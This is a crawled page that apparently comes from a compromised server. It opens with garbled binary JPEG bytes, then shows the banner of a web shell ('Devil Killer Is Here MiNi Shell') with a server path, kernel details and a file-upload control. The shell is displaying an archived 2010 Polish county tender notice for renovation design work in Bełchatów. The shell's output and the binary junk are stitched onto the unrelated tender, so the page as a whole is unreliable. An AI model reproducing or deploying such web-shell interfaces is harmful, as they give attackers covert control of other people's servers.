JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100506/109653-N-2010.html

<p class="kh_header"><b>Bełchatów: Opracowanie dokumentacji projektowej na:Zadanie 1. Przebudowa pomieszczenia biurowego w budynku Powiatowego Zarządu Dróg w Bełchatowie,
Zadanie 2 . Remont budynku szkoły I Liceum Ogólnokształcącego w Bełchatowie.
Zadanie 3. Remont dachu na budynku Domu Pomocy Społecznej w Zabłotach,
Zadanie 4. Wymiana okien w budynku Domu Pomocy Społecznej w Bełchatowie,
Zadanie 5. Remont dachu nad częścią sportową i wejściem głównym w Zespole Szkół
Ponadgimnazjalnych Nr 3 w Bełchatowie,
Zadanie 6.Remont pom. piwnic - szatni w II LO w Bełchatowie,
Zadanie 7.Remont pom. w bud. Starostwa Pow. w B-wie</b><br>
<b>Numer ogłoszenia: 109653 - 2010; data zamieszczenia: 06.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bełchatowie , ul. Pabianicka 17/19, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358600, faks 044 6358617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-belchatowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na:Zadanie 1. Przebudowa pomieszczenia biurowego w budynku Powiatowego Zarządu Dróg w Bełchatowie,
Zadanie 2 . Remont budynku szkoły I Liceum Ogólnokształcącego w Bełchatowie.
Zadanie 3. Remont dachu na budynku Domu Pomocy Społecznej w Zabłotach,
Zadanie 4. Wymiana okien w budynku Domu Pomocy Społecznej w Bełchatowie,
Zadanie 5. Remont dachu nad częścią sportową i wejściem głównym w Zespole Szkół
Ponadgimnazjalnych Nr 3 w Bełchatowie,
Zadanie 6.Remont pom. piwnic - szatni w II LO w Bełchatowie,
Zadanie 7.Remont pom. w bud. Starostwa Pow. w B-wie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej na:
Zadanie 1. Przebudowa pomieszczenia biurowego w budynku Powiatowego Zarządu
Dróg w Bełchatowie,
Zadanie 2 . Remont budynku szkoły I Liceum Ogólnokształcącego w Bełchatowie.
Opracowanie dokumentacji służącej do opisu przedmiotu zamówienia na roboty
budowlane: rysunków, opisów technicznych, przedmiarów, kosztorysów oraz
specyfikacji technicznych wykonania i odbioru robót budowlanych na:
Zadanie 3. Remont dachu na budynku Domu Pomocy Społecznej w Zabłotach,
Zadanie 4. Wymiana okien w budynku Domu Pomocy Społecznej w Bełchatowie,
Zadanie 5. Remont dachu nad częścią sportową i wejściem głównym w Zespole Szkół
Ponadgimnazjalnych Nr 3 w Bełchatowie,
Zadanie 6.Remont pomieszczeń piwnic - szatni w II Liceum Ogólnokształcącym
w Bełchatowie,
Zadanie 7.Remont pomieszczenia w budynku Starostwa Powiatowego przy
ul. Pabianickiej 34 w Bełchatowie. Założenia projektowe do projektu:
Zadanie 1. Przebudowa pomieszczenia biurowego w budynku Powiatowego Zarządu
Dróg w Bełchatowie:
Do projektanta będzie należało opracowanie dokumentacji, która powinna obejmować
wybicie jednego otworu okiennego wraz z osadzeniem stolarki - 1 szt. w budynku
Powiatowego Zarządu Dróg przy ul. Lipowej 67 w Bełchatowie.
Zadanie 2 . Remont budynku szkoły I Liceum Ogólnokształcącego w Bełchatowie.:
Do projektanta będzie należało opracowanie dokumentacji projektowej na kompleksowy
remont budynku I Liceum Ogólnokształcącego przy ul. 1-go maja 6 w Bełchatowie (roboty
budowlane, instalacje elektryczne i sanitarne) wraz z dokonaniem oceny stanu technicznego
w pełnym zakresie całego budynku.
Opracowana dokumentacja musi spełniać wymagania formalno-prawne dotyczące
użytkowania obiektu po przeprowadzonym remoncie w pełnym zakresie.
Zadanie 3. Remont dachu na budynku Domu Pomocy Społecznej w Zabłotach:
Do projektanta będzie należało opracowanie dokumentacji na remont dachu (wymiana
pokrycia bądź smarowanie dachu) wraz z koniecznymi uzupełnieniami obróbek blacharskich
oraz naprawę instalacji odgromowej w budynku DPS oznaczonym nr 19 w Zabłotach,
Gmina Zelów.
Zadanie 4. Wymiana okien w budynku Domu Pomocy Społecznej w Bełchatowie:
Do projektanta będzie należało opracowanie dokumentacji na wymianę 101 szt. stolarki
okiennej drewnianej na PCV wraz z wymianą parapetów zewnętrznych oraz zabudową 5 szt.
otworów luksferami w budynku Domu Pomocy Społecznej przy ul. Dąbrowskiego 2
w Bełchatowie.
Zadanie 5. Remont dachu nad częścią sportową i wejściem głównym w Zespole Szkół
Ponadgimnazjalnych Nr 3 w Bełchatowie:
Do projektanta będzie należało opracowanie dokumentacji na remont dachu (wymiana
pokrycia bądź smarowanie dachu) wraz z koniecznymi uzupełnieniami obróbek blacharskich
oraz naprawę instalacji odgromowej w budynku ZSP nr 3 przy ul. Czaplinieckiej 96
w Bełchatowie.
Zadanie 6.Remont pomieszczeń piwnic - szatni w II Liceum Ogólnokształcącym
w Bełchatowie:
Do projektanta będzie należało opracowanie dokumentacji na remont szatni w budynku II
LO przy ul. Czaplinieckiej 72 w Bełchatowie. Remont obejmuje: rozbiórkę boksów,
malowanie, nałożenie tynku ozdobnego oraz płytek ściennych w pomieszczeniu szatni.
Zadanie 7. Remont pomieszczenia w budynku Starostwa Powiatowego przy
ul.Pabianickiej 34 w Bełchatowie:
Do projektanta będzie należało opracowanie dokumentacji, która powinna zawierać
wymianę podłogi w jednym pomieszczeniu o wymiarach ok.4,40 x 4,60 m, zbudowanie
nowej posadzki oraz malowanie pomieszczenia w budynku Starostwa Powiatowego przy
ul. Pabianickiej 34 w Bełchatowie.
Dokumentacja obejmuje dla Zadania 1i Zadania 2:
1) Projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych w 5 egz.
2) Projekty wykonawcze uzupełniające i uszczegóławiające projekt budowlany w 5 egz.
3) Kosztorys inwestorski w 2 egz.
4) Przedmiar robót w 5 egz.
5) Informacja dotycząca bezpieczeństwa i ochrony zdrowia w 5 egz.
6) Specyfikację techniczną wykonania i odbioru robót budowlanych w 5 egz.
w formie wydrukowanej oraz w wersji elektronicznej na płycie CD (pojedynczy plik nie
może być większy niż 5MB.
Do Wykonawcy będzie należało:
w zakresie Zadania 1 i Zadania 2 uzyskanie wszelkich przewidzianych prawem
uzgodnień zatwierdzających projekty oraz uzyskanie pozwolenia na budowę.
Dokumentacja obejmuje dla Zadania 3, Zadania 4, Zadania 5, Zadania 6 i Zadania 7:
1) Rysunki techniczne i opis techniczny umożliwiający jednoznaczne określenie rodzaju
i zakresu robót budowlanych oraz uwarunkowań i dokładnej lokalizacji ich wykonania
- w 5 egz.
2) Kosztorys inwestorski w 2 egz.
3) Przedmiar robót w 5 egz.
4) Specyfikację techniczną wykonania i odbioru robót budowlanych - 5 egz.
w formie wydrukowanej w 5 egzemplarzach oraz w wersji elektronicznej na płycie CD
(pojedynczy plik nie może być większy niż 5MB.
W zakresie Zadania 4: dodatkowo audyt energetyczny - szt. 3. Dokumentację projektowo - kosztorysową należy opracować z uwzględnieniem
Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia
metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych
kosztów prac projektowych oraz planowanych kosztów robót budowlanych
określonych w programie funkcjonalno - użytkowym /Dz. U. Nr 130, poz. 1389/ oraz
Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie
szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych
wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego
/Dz. U. Nr 202, poz. 2072 z późn. zm/.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży
oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:
Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie
przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży
oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:
Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie
przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży
oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:
Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie
przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży
oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty) oraz przedłoży
oświadczenie potwierdzające spełnienie następujących warunków:
w zakresie zadania 1, zadania 3, zadania 4, zadania 5, zadania 6 i zadania 7
posiadania uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej
bez ograniczeń lub w ograniczonym zakresie (załącznik nr 3 do formularza oferty);
w zakresie Zadania 2: posiadania uprawnienia do projektowania w specjalności
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,
gazowych, wodociągowych i kanalizacyjnych, w specjalności instalacyjnej
w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz
w specjalności konstrukcyjno-budowlanej bez ograniczeń (załącznik nr 3 do
formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:
Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie
przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży
oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:
Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie
przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy - z wykorzystaniem wzoru określonego w SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej Umowy po jej zawarciu w stosunku do treści oferty
złożonej przez Wykonawcę jest dopuszczalna przy zachowaniu następujących warunków:
1) przedmiotu zamówienia, pod warunkiem, że będą one na korzyść Zamawiającego albo
zaszły okoliczności których nie można było przewidzieć w chwili zawarcia Umowy,
2) terminu wykonania umowy, pod warunkiem, że zaszły okoliczności, których nie można
było przewidzieć w chwili zawarci umowy, w szczególności:
a) w następstwie wykraczających poza terminy określone w Kodeksie Postępowania
Administracyjnego procedur administracyjnych oraz innych terminów formalno - prawnych
mających wpływ na terminy realizacji zamówienia,
b) działania siły wyższej.
3) wynagrodzenia umownego pod warunkiem, że zmiany te są korzystne dla Zamawiającego
lub zmiany te będą spowodowane zmniejszeniem zakresu przedmiotu zamówienia.
4)Zamawiający postanowił zmienić zakres realizowanego zamówienia bądź inne
postanowienia Umowy ze względu na nowe okoliczności, o których nie wiedział
zawierając Umowę .
Wszelkie zmiany Umowy pod rygorem nieważności wymagają formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.e-bip.pl/start/46<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo
Powiatowe w Bełchatowie, ul. Pabianicka 17/19, 97-400 Bełchatów, Wydział Zamówień
Publicznych i Inwestycji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2010 godzina 11:00, miejsce: Starostwo Powiatowe w Bełchatowie ul. Pabianicka 17/19, 97-
400 Bełchatów, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na:
Zadanie 1. Przebudowa pomieszczenia biurowego w budynku Powiatowego Zarządu
Dróg w Bełchatowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do projektanta będzie należało opracowanie dokumentacji, która powinna obejmować
wybicie jednego otworu okiennego wraz z osadzeniem stolarki - 1 szt. w budynku
Powiatowego Zarządu Dróg przy ul. Lipowej 67 w Bełchatowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na:
Zadanie 2 . Remont budynku szkoły I Liceum Ogólnokształcącego w Bełchatowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do projektanta będzie należało opracowanie dokumentacji projektowej na kompleksowy
remont budynku I Liceum Ogólnokształcącego przy ul. 1-go Maja 6 w Bełchatowie (roboty
budowlane, instalacje elektryczne i sanitarne) wraz z dokonaniem oceny stanu technicznego
w pełnym zakresie całego budynku.
Opracowana dokumentacja musi spełniać wymagania formalno-prawne dotyczące
użytkowania obiektu po przeprowadzonym remoncie w pełnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji służącej do opisu przedmiotu zamówienia na roboty
budowlane: rysunków, opisów technicznych, przedmiarów, kosztorysów oraz
specyfikacji technicznych wykonania i odbioru robót budowlanych na:
Zadanie 3. Remont dachu na budynku Domu Pomocy Społecznej w Zabłotach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do projektanta będzie należało opracowanie dokumentacji na remont dachu (wymiana
pokrycia bądź smarowanie dachu) wraz z koniecznymi uzupełnieniami obróbek blacharskich
oraz naprawę instalacji odgromowej w budynku DPS oznaczonym nr 19 w Zabłotach,
Gmina Zelów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
